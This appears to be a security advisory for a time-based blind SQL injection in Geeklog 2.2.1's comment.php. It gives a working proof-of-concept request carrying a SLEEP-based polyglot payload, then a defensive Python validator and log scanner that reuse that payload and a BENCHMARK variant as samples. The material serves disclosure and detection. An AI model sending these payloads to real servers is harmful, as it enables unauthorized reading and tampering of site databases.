Geeklog 2.2.1 - Blind SQL Injection
Overview
A Blind SQL Injection vulnerability exists in Geeklog CMS version 2.2.1. The vulnerability allows remote attackers to execute arbitrary SQL commands via the uid parameter in comment.php.
Vulnerability Details
Affected Versions: 2.2.1 and earlier
Location: comment.php
Affected Parameter: uid
Root Cause: The uid parameter is used in a database query without sufficient input validation or parameterization, which allows SQL Injection.
Exploitation Requirements
- No authentication required
- Direct access to the comment endpoint
Impact
Remote attackers can exploit this vulnerability to:
- Extract sensitive data from the database
- Bypass authentication mechanisms
- Modify or delete database content
Proof of Concept
POST /geeklog-2.2.1/public_html/comment.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
uid=2+++((SELECT+1+FROM+(SELECT+SLEEP(25))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR"*/
Time-based Blind SQL Injection: if the server response is delayed by about 25 seconds compared with a normal request to the same endpoint, the target is vulnerable.
Solution
Upgrade to a patched version of Geeklog that includes proper input sanitization and parameterized queries.
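The two defensive points on this page, the strict validation the Root Cause calls for and detection of the time-based payload shown in the Proof of Concept, can be checked with a short script. The following is an added example written for this advisory, not Geeklog's own code: it applies an allow-list check to the uid value (what a fixed comment.php should do before any query) and scans constructed request log lines for uid values that fail that check or carry a time-delay primitive. The log format (method, path, and a body="..." field as a WAF or application logger might record a POST) and the sample lines are assumptions; the second sample line reuses the payload from the Proof of Concept above.

```python
import re
from urllib.parse import parse_qs

# Allow-list for the uid parameter: a fixed comment.php should reject anything else
# before the value ever reaches a query, and pass the integer to a parameterized query.
UID_RE = re.compile(r"[0-9]{1,10}")

# SQL time-delay primitives that characterise time-based blind injection attempts.
TIME_BASED = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR)\b", re.IGNORECASE)

# Constructed sample request log lines (assumed format, not real Geeklog logs).
# Line 2 is the payload from the Proof of Concept; line 4 uses BENCHMARK instead of SLEEP.
SAMPLE_LOG = r'''
POST /geeklog-2.2.1/public_html/comment.php body="uid=2&sid=20240101&mode=view"
POST /geeklog-2.2.1/public_html/comment.php body="uid=2+++((SELECT+1+FROM+(SELECT+SLEEP(25))A))/*'XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR'|"XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR"*/"
GET /geeklog-2.2.1/public_html/comment.php body=""
POST /geeklog-2.2.1/public_html/comment.php body="uid=1+OR+BENCHMARK(5000000%2CMD5(1))"
POST /geeklog-2.2.1/public_html/comment.php body="uid=abc"
'''.strip().splitlines()

LINE_RE = re.compile(r'^(\S+) (\S+) body="(.*)"$')


def is_valid_uid(raw: str) -> bool:
    """Strict allow-list check: only a plain decimal user id is acceptable."""
    return UID_RE.fullmatch(raw) is not None


def expected_delay(value: str):
    """Largest SLEEP(n) argument in the value, or None; useful for correlating with response time."""
    delays = [int(n) for n in re.findall(r"SLEEP\((\d+)\)", value, re.IGNORECASE)]
    return max(delays) if delays else None


def analyze(line: str):
    """Return a finding for one request log line targeting comment.php, or None if it looks benign."""
    m = LINE_RE.match(line)
    if not m:
        return None
    method, path, body = m.groups()
    if not path.endswith("/comment.php"):
        return None
    # parse_qs decodes '+' and %XX, giving the value exactly as the application would see it.
    params = parse_qs(body, keep_blank_values=True)
    for uid in params.get("uid", []):
        if is_valid_uid(uid):
            continue
        delay_primitive = TIME_BASED.search(uid) is not None
        return {
            "method": method,
            "path": path,
            "uid": uid,
            "reason": "time-based SQLi" if delay_primitive else "non-numeric uid",
            "expected_delay": expected_delay(uid),
        }
    return None


def scan(lines):
    """Run analyze over every line and keep only the findings."""
    return [f for f in map(analyze, lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["reason"], finding["path"], "expected_delay=", finding["expected_delay"])
```

The expected_delay field lets an analyst confirm the attempt against observed response times: a request whose uid carries SLEEP(25) and whose response took roughly 25 seconds longer than the baseline for the same endpoint is the exact signal the Proof of Concept describes, and is worth treating as a successful probe rather than a blocked one.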